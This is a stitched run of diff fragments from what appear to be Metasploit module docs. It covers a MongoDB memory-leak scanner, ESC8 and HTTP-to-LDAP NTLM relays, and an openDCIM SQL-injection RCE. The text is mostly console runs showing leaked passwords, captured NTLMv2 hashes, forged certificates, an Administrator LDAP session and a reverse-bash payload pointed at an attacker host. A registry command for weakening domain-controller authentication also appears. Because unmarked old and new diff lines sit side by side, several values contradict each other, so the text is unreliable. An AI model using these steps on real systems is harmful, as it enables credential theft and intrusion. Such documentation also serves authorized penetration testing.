Number of scan passes to perform. Memory contents change over time, so multiple passes can capture more data. Default: `1`
### REUSE_CONNECTION
Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each probe. This can improve scanning speed by 10-50x. Default: `true`
Reuse TCP connection for faster scanning. When enabled, the module maintains a persistent connection instead of reconnecting for each
probe. This can improve scanning speed by 10-50x. Default: `true`
## Advanced Options
@@ -124,29 +100,38 @@ Show progress every N offsets. Set to 0 to disable. Default: `500`
Save all raw MongoDB responses to a separate loot file for offline analysis with tools like `strings`, `binwalk`, etc. Default: `false`
### SAVE_JSON
Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful for automated processing or integration with other tools. Default: `true`
Save leaked data as a JSON report with full metadata including offsets, timestamps, base64-encoded data, and detected secrets. Useful
for automated processing or integration with other tools. Default: `true`
## Scenarios
### Using the CHECK Action
### Vulnerability Check
The module supports the standard `check` command. It fingerprints the MongoDB version, verifies zlib compression is enabled, and sends
a crafted magic packet to confirm exploitability.
```
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set ACTION CHECK
ACTION => CHECK
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
[*] 192.168.1.100:27017 - Running vulnerability check against 192.168.1.100:27017...
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 appears vulnerable, confirming with probe...
[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
[*] 192.168.1.100:27017 - Sending Wiz magic packet to confirm vulnerability...
[+] 192.168.1.100:27017 - VULNERABLE - Server leaks memory via CVE-2025-14847 (MongoDB 7.0.14)
[+] 192.168.1.100:27017 - The target is vulnerable. Server leaks memory via crafted OP_COMPRESSED message (MongoDB 4.4.26)
```
### MongoDB 7.0.14 on Linux (with Connection Reuse)
When pointed at a non-MongoDB service, the check correctly identifies it as not vulnerable:
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RPORT 80
RPORT => 80
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check
[-] 192.168.1.200:80 - The target is not exploitable. Target does not appear to be a MongoDB service
```
### MongoDB 4.4.26 on Windows
```
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
@@ -154,26 +139,25 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - Server compressors: zlib, snappy
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - Server compressors: zlib
[*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
[*] 192.168.1.100:27017 - Scanning 8173 offsets (20-8192, step=1)
[+] 192.168.1.100:27017 - offset=20 len=82 : [conn38248] end connection 10.0.0.5:36845 (0 connections now open)
[+] 192.168.1.100:27017 - offset=163 len=617 : driver: { name: "mongoc / ext-mongodb:PHP ", version: "1.24.3" }
[+] 192.168.1.100:27017 - offset=501 len=40 : id bson type in element with field name
[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 7 leaks found - ETA: 49s
[+] 192.168.1.100:27017 - offset=77 len=39 : conn38248] end connection 10.0.0.5:36845
[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 3 leaks found - ETA: 49s
[+] 192.168.1.100:27017 - offset=757 len=12 : password=abc
[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password' in context: ...config: { password=abc123&user=admin...
[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 42s
[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password'
[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 5 leaks found - ETA: 42s
...
[!] 192.168.1.100:27017 - Potential secrets detected:
[!] 192.168.1.100:27017 - - Pattern 'password' at offset 757 (pos 12): ...config: { password=abc123&user=admin...
[!] 192.168.1.100:27017 - - Pattern 'password' at offset 757
[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
[+] 192.168.1.100:27017 - Unique fragments: 13
[+] 192.168.1.100:27017 - Total leaked: 703 bytes
[+] 192.168.1.100:27017 - Unique fragments: 8
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
[+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
[*] 192.168.1.100:27017 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -182,12 +166,15 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
REPEAT => 3
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set MAX_OFFSET 16384
MAX_OFFSET => 16384
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - Server compressors: zlib
[*] 192.168.1.100:27017 - Running 3 scan passes to maximize data collection...
[*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
@@ -211,15 +198,16 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
QUICK_SCAN => true
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - Server compressors: zlib
[*] 192.168.1.100:27017 - Connection reuse enabled for faster scanning
[*] 192.168.1.100:27017 - Scanning 97 offsets (20-8192, step=1, quick mode)
[+] 192.168.1.100:27017 - offset=20 len=45 : connection string fragment...
[+] 192.168.1.100:27017 - offset=128 len=23 : mongodb://admin:pass...
[+] 192.168.1.100:27017 - Total leaked: 234 bytes
@@ -228,33 +216,52 @@ msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[+] 192.168.1.100:27017 - JSON report saved to: /root/.msf4/loot/20251230_mongobleed.json
```
### Server Without zlib Compression
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > check rhost=192.168.123.144
[*] 192.168.123.144:27017 - The target is not exploitable. Server does not have zlib compression enabled (MongoDB 4.4.26)
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run rhost=192.168.123.144
[*] 192.168.123.144:27017 - MongoDB version: 4.4.26
[+] 192.168.123.144:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
[*] 192.168.123.144:27017 - Server compressors: none
[-] 192.168.123.144:27017 - Server does not support zlib compression - vulnerability not exploitable
[*] 192.168.123.144:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
[*] 192.168.123.144:27017 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### JSON Report Output
The JSON report includes full metadata for each leak:
When `SAVE_JSON` is enabled (the default), the module saves a structured JSON report alongside the raw loot. This includes full
metadata for each leak fragment:
```json
{
"scan_info": {
"target": "192.168.1.100",
"port": 27017,
"mongodb_version": "7.0.14",
"mongodb_version": "4.4.26",
"scan_time": "2025-12-30T14:30:00Z",
"cve": "CVE-2025-14847"
},
"summary": {
"total_leaks": 13,
"total_bytes": 1703,
"secrets_found": 2
"total_leaks": 8,
"total_bytes": 703,
"secrets_found": 1
},
"secrets": [
"Pattern 'password' at offset 757..."
],
"leaks": [
{
"offset": 20,
"length": 82,
"data_base64": "W2Nvbm4zODI0OF0gZW5kIGNvbm5lY3Rpb24...",
"data_printable": "[conn38248] end connection 10.0.0.5:36845...",
"offset": 77,
"length": 39,
"data_base64": "Y29ubjM4MjQ4XSBlbmQgY29ubmVjdGlvbi4uLg==",
"data_printable": "conn38248] end connection 10.0.0.5:36845",
"has_secret": false,
"timestamp": "2025-12-30T14:30:01Z"
}
@@ -262,8 +269,9 @@ The JSON report includes full metadata for each leak:
}
```
You can process the JSON with standard tools:
```bash
The JSON report can be processed with standard tools:
```
# Extract all leaked data
cat mongobleed.json | jq -r '.leaks[].data_printable'
@@ -278,43 +286,33 @@ cat mongobleed.json | jq '.summary'
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set SAVE_RAW_RESPONSES true
SAVE_RAW_RESPONSES => true
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - MongoDB version: 4.4.26
[+] 192.168.1.100:27017 - Version 4.4.26 is VULNERABLE to CVE-2025-14847
...
[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
[+] 192.168.1.100:27017 - Unique fragments: 13
[+] 192.168.1.100:27017 - Total leaked: 703 bytes
[+] 192.168.1.100:27017 - Unique fragments: 8
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
[+] 192.168.1.100:27017 - Raw responses saved to: /root/.msf4/loot/20251230_mongobleed_raw.bin
```
You can then analyze the raw responses offline:
```bash
```
strings /root/.msf4/loot/20251230_mongobleed_raw.bin | grep -i password
```
### Server Without zlib Compression
```
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
[*] 192.168.1.100:27017 - Server compressors: snappy
[-] 192.168.1.100:27017 - Server does not support zlib compression - vulnerability not exploitable
[*] 192.168.1.100:27017 - The CVE-2025-14847 vulnerability requires zlib compression to be enabled
[*] Auxiliary module execution completed
```
## Technical Details
### How the Vulnerability Works
The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated buffer size) instead of the actual decompressed data length. This allowed attackers to:
The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was caused by returning `output.length()` (the allocated
buffer size) instead of the actual decompressed data length. This allowed attackers to:
1. Send a compressed message claiming a large uncompressed size
2. MongoDB allocates a buffer based on the claimed size
@@ -324,7 +322,12 @@ The vulnerability exists in MongoDB's `message_compressor_zlib.cpp`. The bug was
### Detection Technique
The Wiz Research "magic packet" used in the `check` method sends a minimal BSON document `{"a": 1}` inside a malformed `OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON signatures or field name errors containing unexpected data, the vulnerability is confirmed.
The Wiz Research "magic packet" used in the `check` command sends a minimal BSON document `{"a": 1}` inside a malformed
`OP_COMPRESSED` message with an inflated `uncompressedSize` field. If the server responds with BSON parsing errors, the vulnerability
is confirmed, since a patched server rejects the inflated size before parsing.
The module validates that the target is actually a MongoDB service before probing, preventing false positives against non-MongoDB
services. Standard MongoDB error message strings are filtered from leak results to avoid reporting server error text as leaked memory.
## References
@@ -33,9 +33,60 @@ The template to issue if MODE is SPECIFIC_TEMPLATE.
## Scenarios
### Version and OS
### NTLM
```
msf auxiliary(server/relay/esc8) > show options
Module options (auxiliary/server/relay/esc8):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can
be a path.
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 ha
shes, each of which is stored in separate files. Can also be a path.
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
ies: socks5h, sapni, socks4, http, socks5
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the client has
initiated communication.
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
sics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on
the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the client has
initiated communication.
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
Auxiliary action:
Name Description
---- -----------
Relay Run SMB ESC8 relay server
View the full module info with the info, or info -d command.
msf auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 1.
msf auxiliary(server/relay/esc8) >
@@ -63,3 +114,157 @@ msf auxiliary(server/relay/esc8) >
[*] Received request for MSFLAB\smcintyre
[*] Identity: MSFLAB\smcintyre - All targets relayed to
```
### NTLM and ESC1
```
msf auxiliary(server/relay/esc8) > show options
Module options (auxiliary/server/relay/esc8):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can
be a path.
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 ha
shes, each of which is stored in separate files. Can also be a path.
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported prox
ies: socks5h, sapni, socks4, http, socks5
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the client has
initiated communication.
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
sics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on
the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the client has
initiated communication.
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
Auxiliary action:
Name Description
---- -----------
Relay Run SMB ESC8 relay server
View the full module info with the info, or info -d command.
msf auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(server/relay/esc8) >
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 10.5.132.122
[*] Received request for \msfuser
[*] Relaying to next target http://10.5.132.180:80/certsrv/
[+] Identity: \msfuser - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
[SMB] NTLMv2-SSP Client : 10.5.132.180
[SMB] NTLMv2-SSP Username : \msfuser
[SMB] NTLMv2-SSP Hash : msfuser:::af0b69bf0b95c55e:db5ce84b2f41b82d7df93bd2566c06b6:0101000000000000cbf836e63587dc013ce37255fbca75410000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800cbf836e63587dc01060004000200000008003000300000000000000000000000003000002ad3656a59fe53f773d5bc3852373338e1f3270cdbdf9411b84ef184151925510a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
[+] Certificate generated using template ESC1-Template and \msfuser
[+] Certificate for \msfuser using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116161729_default_10.5.132.180_windows.ad.cs_994769.pfx
[*] Received request for \msfuser
[*] Identity: \msfuser - All targets relayed to
```
### NTLM and ESC2
```msf
msf auxiliary(server/relay/esc8) > show options
Module options (auxiliary/server/relay/esc8):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 h
ashes. Can be a path.
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 an
d NTLMv2 hashes, each of which is stored in separate files. Can a
lso be a path.
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLA
TE)
ON_BEHALF_OF EXAMPLE\Administrator no Username to request on behalf of (format: DOMAIN\USER)
PFX /home/tmoose/.msf4/loot/202601161509 no Certificate to request on behalf of
11_default_10.5.132.180_windows.ad.c
s_854591.pfx
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Sup
ported proxies: socks5h, sapni, socks4, http, socks5
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the
client has initiated communication.
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-me
tasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
address on the local machine or 0.0.0.0 to listen on all address
es.
SRVPORT 445 yes The local port to listen on.
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the
client has initiated communication.
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE User no The template to issue if MODE is SPECIFIC_TEMPLATE.
Auxiliary action:
Name Description
---- -----------
Relay Run SMB ESC8 relay server
View the full module info with the info, or info -d command.
msf auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(server/relay/esc8) >
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 10.5.132.122
[*] Received request for \msfuser
[*] Relaying to next target http://10.5.132.180:80/certsrv/
[+] Identity: \msfuser - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
[SMB] NTLMv2-SSP Client : 10.5.132.180
[SMB] NTLMv2-SSP Username : \msfuser
[SMB] NTLMv2-SSP Hash : msfuser:::916940a20e939a34:7f5150c74cba44513fcb2e7ed28e8f45:0101000000000000bf1765b93787dc01c7c75e835e16b4ad0000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800bf1765b93787dc01060004000200000008003000300000000000000000000000003000002ad3656a59fe53f773d5bc3852373338e1f3270cdbdf9411b84ef184151925510a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
[+] Certificate generated using template User and \msfuser
[+] Certificate for \msfuser using template User saved to /home/tmoose/.msf4/loot/20260116163102_default_10.5.132.180_windows.ad.cs_883392.pfx
[*] Received request for \msfuser
[*] Identity: \msfuser - All targets relayed to
```
@@ -0,0 +1,108 @@
## Vulnerable Application
### Description
This module sets up an HTTP server that attempts to execute an NTLM relay attack against an LDAP server on the
configured `RHOSTS`. The relay attack targets NTLMv1 authentication, as NTLMv2 cannot be relayed to LDAP due to the
Message Integrity Check (MIC). The module automatically removes the relevant flags to bypass signing.
This module supports relaying one HTTP authentication attempt to multiple LDAP servers. After attempting to relay to
one target, the relay server sends a 307 to the client and if the client is configured to respond to redirects, the
client resends the NTLMSSP_NEGOTIATE request to the relay server. Multi relay will not work if the client does not
respond to redirects.
The module supports relaying NTLM authentication which has been wrapped in GSS-SPNEGO. HTTP authentication info is sent
in the WWW-Authenticate header. In the auth header base64 encoded NTLM messages are denoted with the NTLM prefix, while
GSS wrapped NTLM messages are denoted with the Negotiate prefix. Note that in some cases non-GSS wrapped NTLM auth can
be prefixed with Negotiate.
If the relay attack is successful, an LDAP session is created on the target. This session can be used by other modules
that support LDAP sessions, such as:
- `admin/ldap/rbcd`
- `auxiliary/gather/ldap_query`
The module also supports capturing NTLMv1 and NTLMv2 hashes.
### Setup
For this relay attack to be successful, it is important to understand the difference between the Target Server (the
Domain Controller receiving the relayed authentication) and the Victim Client (the machine sending the initial HTTP
request) and how their respective configurations can impact the success of the attack.
The Domain Controller must be configured to accept LM or NTLM authentication. This means the `LmCompatibilityLevel`
registry key on the DC must be set to 4 or lower. If it is set to `5` ("Send NTLMv2 response only. Refuse
LM and NTLM"), the DC will reject the relayed authentication and the module will fail.
You can verify or modify the Domain Controller's level using the following commands:
```cmd
# To check the current level:
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel
# To set the level to 4 (or lower):
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x4 /f
```
The client being coerced must be willing to send the vulnerable NTLM responses.
- Non-Windows Clients: Custom tools or Linux-based HTTP clients are unaffected by Windows registry keys and can easily
be relayed to a vulnerable DC.
- Windows Clients: If you are coercing a native Windows HTTP client (like `Invoke-WebRequest` or a browser), the victim
machine's `LmCompatibilityLevel` dictates what it is allowed to send. To successfully relay a Windows client, its local
registry key typically needs to be set to `2` or lower. If the Windows client is operating at level `3` or higher, it
restricts itself to sending only NTLMv2 responses, which will cause the relay to fail even if the target DC is vulnerable.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/server/relay/http_to_ldap`
3. Set the `RHOSTS` options
4. Run the module
5. Send an authentication attempt to the relay server
6. `Invoke-WebRequest -Uri http://192.0.2.1/test -UseDefaultCredentials`
7. Check the output for successful relays and captured hashes
## Scenarios
### Relaying to multiple targets
```
msf auxiliary(server/relay/http_to_ldap) > set rhosts 172.16.199.200 172.16.199.201
rhosts => 172.16.199.200 172.16.199.201
msf auxiliary(server/relay/http_to_ldap) > run
[*] Auxiliary module running as background job 2.
[*] Relay Server started on 0.0.0.0:80
[*] Server started.
msf auxiliary(server/relay/http_to_ldap) > [*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
[*] Attempting to relay to ldap://172.16.199.201:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://172.16.199.201:389, attempting to relay back to client
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state awaiting_type3 from 172.16.199.130
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded
[*] Moving to next target (172.16.199.200). Issuing 307 Redirect to /ZdF7Ufkm0I
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
[*] Attempting to relay to ldap://172.16.199.200:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state awaiting_type3 from 172.16.199.130
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded
[*] Target list exhausted for 172.16.199.130. Closing connection.
msf auxiliary(server/relay/http_to_ldap) > sessions -i -1
[*] Starting interaction with 5...
LDAP (172.16.199.200) > getuid
[*] Server username: KERBEROS\Administrator
LDAP (172.16.199.200) >
```
@@ -0,0 +1,231 @@
## Vulnerable Application
This module exploits a SQL injection vulnerability in openDCIM's `install.php` endpoint
(CVE-2026-28515) to achieve remote code execution.
After installation, `install.php` remains accessible and processes LDAP configuration
parameters via `UpdateParameter()` without authentication or input sanitization. The
attacker injects stacked SQL queries through the LDAP form to overwrite the Graphviz
`dot` binary path in `fac_Config`, then triggers `report_network_map.php` which calls
`exec()` with the poisoned value.
### Affected Versions
openDCIM version 23.04 (last public release), through commit 4467e9c4, is affected. Tested up to 25.01.
### Attack Chain
1. POST to `install.php` with stacked SQL via LDAP parameters (CWE-862 + CWE-89)
2. Backup original config, overwrite `dot` parameter with command payload
3. GET `report_network_map.php` which calls `exec()` with the poisoned `dot` value (CWE-78)
4. Restore original configuration from backup table
## Lab Setup
### Docker (Recommended)
The official openDCIM Docker image (`opendcim/opendcim`) ships with no authentication
configured. openDCIM delegates auth entirely to Apache via `$_SERVER['REMOTE_USER']` -
without it, every page errors out. Real-world Docker deployments work around this by adding
`SetEnv REMOTE_USER dcim` to the Apache vhost, which sets `REMOTE_USER` for every request
without any actual credential check. This makes the entire application unauthenticated.
The lab reproduces this scenario. Create the following files:
**docker-compose.yml:**
```yaml
services:
web:
build: .
container_name: opendcim-lab
ports:
- "18091:80"
environment:
OPENDCIM_DB_HOST: db
depends_on:
db:
condition: service_healthy
db:
image: mariadb:10.7
container_name: opendcim-db
environment:
MARIADB_ROOT_PASSWORD: rootpass
MARIADB_DATABASE: dcim
MARIADB_USER: dcim
MARIADB_PASSWORD: dcim
volumes:
- db_data:/var/lib/mysql
healthcheck:
test: ["CMD", "mariadb", "-udcim", "-pdcim", "-e", "SELECT 1"]
interval: 5s
timeout: 5s
retries: 20
volumes:
db_data:
```
**Dockerfile:**
```dockerfile
FROM opendcim/opendcim:24.01-beta
COPY 000-default.conf /etc/apache2/sites-available/
```
**000-default.conf:**
```apache
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
<Directory "/var/www/html">
Options -Indexes
AllowOverride All
SetEnv REMOTE_USER dcim
</Directory>
AllowEncodedSlashes On
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```
Then run:
```bash
docker compose up -d
```
This starts openDCIM on port 18091 with `SetEnv REMOTE_USER dcim`, reproducing how Docker
deployments are configured in the wild. No HTTP credentials are needed.
**Note:** If the target uses HTTP Basic Auth (htpasswd/LDAP), set `HttpUsername` and
`HttpPassword` accordingly. Any valid Apache credential is enough - `install.php` has no
role check.
**Note:** The fetch payload handler is not supported with Target 0 (Unix/Linux Command Shell)
since standard fetch tools (curl, wget, etc.) are typically not available in the target's
execution context (`exec()` via Graphviz dot path).
## Verification Steps
1. Start msfconsole
2. `use exploit/linux/http/opendcim_install_sqli_rce`
3. `set RHOSTS <target>`
4. `set RPORT <port>`
5. `set HttpUsername <user>` (if Basic Auth is configured)
6. `set HttpPassword <pass>`
7. `set LHOST <attacker_ip>`
8. `set payload cmd/unix/reverse_bash`
9. `check`
10. `exploit`
11. You should get a shell as the Apache user (typically `www-data`)
## Options
### HttpUsername (Advanced)
HTTP Basic Auth username. Leave empty for deployments using Apache `SetEnv REMOTE_USER`.
### HttpPassword (Advanced)
